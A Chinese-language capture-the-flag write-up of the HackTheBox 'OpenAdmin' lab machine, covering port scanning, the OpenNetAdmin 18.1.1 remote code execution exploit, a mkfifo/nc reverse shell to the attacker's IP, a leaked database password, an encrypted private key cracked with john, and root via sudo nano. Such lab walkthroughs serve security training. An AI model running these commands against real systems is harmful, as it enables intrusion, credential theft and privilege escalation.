OpenAdmin-htb-writeup

0x00 靶场技能介绍

章节技能：OpenNetAdmin v18.1.1命令执行、MySQL数据库配置文件敏感信息泄露、Linux异常进程情况分析、apache2配置文件敏感信息泄露、id_rsa解密、nano错配提权

参考链接：https://github.com/rafaelbaldasso/CTF-Writeups/blob/main/HackTheBox/OpenAdmin.md

0x01 用户权限获取

1、获取下IP地址：10.10.10.171

2、扫描下开放端口，看看存在哪些服务信息

sudo nmap -sT -sV -sC -O -p"22,80," "10.10.10.171"

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)

3、但是80端口的默认首页是Apache的默认页面，故此开始扫描目录信息

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://10.10.10.171 --wordlist=/usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.171
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/artwork              (Status: 301) [Size: 314] [--> http://10.10.10.171/artwork/]
/index.html           (Status: 200) [Size: 10918]
/music                (Status: 301) [Size: 312] [--> http://10.10.10.171/music/]
/server-status        (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.171 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.171/_23-12-09_22-51-28.txt

Target: http://10.10.10.171/

[22:51:28] Starting: 
[22:51:47] 403 -  277B  - /.ht_wsr.txt                                      
[22:51:47] 403 -  277B  - /.htaccess.bak1                                   
[22:51:47] 403 -  277B  - /.htaccess.orig                                   
[22:51:47] 403 -  277B  - /.htaccess.sample
[22:51:47] 403 -  277B  - /.htaccess.save
[22:51:47] 403 -  277B  - /.htaccess_extra                                  
[22:51:47] 403 -  277B  - /.htaccess_orig
[22:51:47] 403 -  277B  - /.htaccess_sc
[22:51:47] 403 -  277B  - /.htaccessBAK
[22:51:47] 403 -  277B  - /.htaccessOLD                                     
[22:51:47] 403 -  277B  - /.htaccessOLD2                                    
[22:51:47] 403 -  277B  - /.html                                            
[22:51:47] 403 -  277B  - /.htm
[22:51:47] 403 -  277B  - /.htpasswd_test                                   
[22:51:47] 403 -  277B  - /.htpasswds                                       
[22:51:47] 403 -  277B  - /.httr-oauth
[22:51:51] 403 -  277B  - /.php                                             
[22:53:26] 301 -  312B  - /music  ->  http://10.10.10.171/music/            
[22:53:31] 301 -  310B  - /ona  ->  http://10.10.10.171/ona/                
[22:53:48] 403 -  277B  - /server-status                                    
[22:53:48] 403 -  277B  - /server-status/                                   

Task Completed

4、然后发现3个网站信息

http://10.10.10.171/artwork/

http://10.10.10.171/music/

http://10.10.10.171/ona/

5、根据对3个网站的分析，发现主要是针对 OpenNetAdmin v18.1.1 的攻击利用，我通过谷歌搜索，发现了一个漏洞利用

https://github.com/amriunix/ona-rce

6、通过尝试，发现确实存在该漏洞

┌──(kali㉿kali)-[~/桌面]
└─$ python3 ona-rce.py check http://10.10.10.171/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] The remote host is vulnerable!

7、至此，通过该漏洞成功获取到第一个初始点的shell

┌──(kali㉿kali)-[~/桌面]
└─$ python3 ona-rce.py exploit http://10.10.10.171/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.7 443 >/tmp/f

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.171] 41744
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@openadmin:/opt/ona/www$ 
www-data@openadmin:/opt/ona/www$ 

8、通过对当前根目录的不断枚举，其中走偏了很多，不过还是获取到了一个密码，通过尝试，发现可以获取到 jimmy 用户的权限

www-data@openadmin:/opt/ona/www$ ls -la /home
ls -la /home
total 16
drwxr-xr-x  4 root   root   4096 Nov 22  2019 .
drwxr-xr-x 24 root   root   4096 Aug 17  2021 ..
drwxr-x---  5 jimmy  jimmy  4096 Nov 22  2019 jimmy
drwxr-x---  5 joanna joanna 4096 Jul 27  2021 joanna
www-data@openadmin:/opt/ona/www$
www-data@openadmin:/opt/ona/www$ ls -la
ls -la
total 72
drwxrwxr-x 10 www-data www-data 4096 Nov 22  2019 .
drwxr-x---  7 www-data www-data 4096 Nov 21  2019 ..
-rw-rw-r--  1 www-data www-data 1970 Jan  3  2018 .htaccess.example
drwxrwxr-x  2 www-data www-data 4096 Jan  3  2018 config
-rw-rw-r--  1 www-data www-data 1949 Jan  3  2018 config_dnld.php
-rw-rw-r--  1 www-data www-data 4160 Jan  3  2018 dcm.php
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 images
drwxrwxr-x  9 www-data www-data 4096 Jan  3  2018 include
-rw-rw-r--  1 www-data www-data 1999 Jan  3  2018 index.php
drwxrwxr-x  5 www-data www-data 4096 Jan  3  2018 local
-rw-rw-r--  1 www-data www-data 4526 Jan  3  2018 login.php
-rw-rw-r--  1 www-data www-data 1106 Jan  3  2018 logout.php
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 modules
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 plugins
drwxrwxr-x  2 www-data www-data 4096 Jan  3  2018 winc
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 workspace_plugins
www-data@openadmin:/opt/ona/www$
www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
cat database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>www-data@openadmin:/opt/ona/www/local/config$

┌──(kali㉿kali)-[~/桌面]
└─$ ssh jimmy@10.10.10.171                 
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
ED25519 key fingerprint is SHA256:wrS/uECrHJqacx68XwnuvI9W+bbKl+rKdSh799gacqo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.171' (ED25519) to the list of known hosts.
jimmy@10.10.10.171's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Dec  9 16:01:59 UTC 2023

  System load:  0.0               Processes:             177
  Usage of /:   30.9% of 7.81GB   Users logged in:       0
  Memory usage: 14%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

39 packages can be updated.
11 updates are security updates.


Last login: Thu Jan  2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$ 

9、但是该目录下并没有用户级flag，可能需要获取 joanna 权限才可以，在继续枚举中，通过 ss -tln 等查询进行，发现还存在一个内部的进程WEB网站，且通过枚举apache2文件，还是发现了相关配置文件信息

jimmy@openadmin:/etc/apache2$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>
jimmy@openadmin:/etc/apache2$ 

jimmy@openadmin:/etc/apache2$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23  2019 .
drwxr-xr-x 4 root  root     4096 Nov 22  2019 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22  2019 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23  2019 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23  2019 main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$

10、在这里我们发现可以通过直接获取main.php文件来获取到joanna的id_rsa文件。

jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$

11、但是在尝试Ssh进行登录时，发现需要输入密码，故进行密码破解下

┌──(kali㉿kali)-[~/桌面]
└─$ ssh2john id_rsa > id_rsa.txt

┌──(kali㉿kali)-[~/桌面]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt    
[sudo] kali 的密码：
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (hash)     
1g 0:00:00:01 DONE (2023-12-10 00:48) 0.6024g/s 5767Kp/s 5767Kc/s 5767KC/s bloodninjas..bloodmoon007
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

12、然后我们成功获取到第一个用户flag文件

┌──(kali㉿kali)-[~/桌面]
└─$ chmod 600 hash                 

┌──(kali㉿kali)-[~/桌面]
└─$ ssh joanna@10.10.10.171 -i hash
Enter passphrase for key 'hash': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Dec  9 16:53:45 UTC 2023

  System load:  0.0               Processes:             182
  Usage of /:   31.0% of 7.81GB   Users logged in:       1
  Memory usage: 15%               IP address for ens160: 10.10.10.171
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

39 packages can be updated.
11 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Jul 27 06:12:07 2021 from 10.10.14.15
joanna@openadmin:~$
joanna@openadmin:~$cat /home/joanna/user.txt
33217857bc668c78816c04226aff333

0x02 系统权限获取

13、通过sudo 查看，发现了可以使用 nano 的提权进行获取到最终的权限

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET",
    env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
joanna@openadmin:~$ 

14、查询 gtfobins 文件，获取到提权方法，成功进行提权获取到最终的root的flag文件

https://gtfobins.github.io/gtfobins/nano/

sudo nano
^R^X
reset; sh 1>&0 2>&0

Command to execute: reset; sh 1>&0 2>&0#                                     
# idet Help                           ^X Read File
uid=0(root) gid=0(root) groups=0(root)M-F New Buffer
# id
uid=0(root) gid=0(root) groups=0(root)
# 
# 
# cat /root/root.txt
a90b7857bc668c78816c04226aff903c
# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/222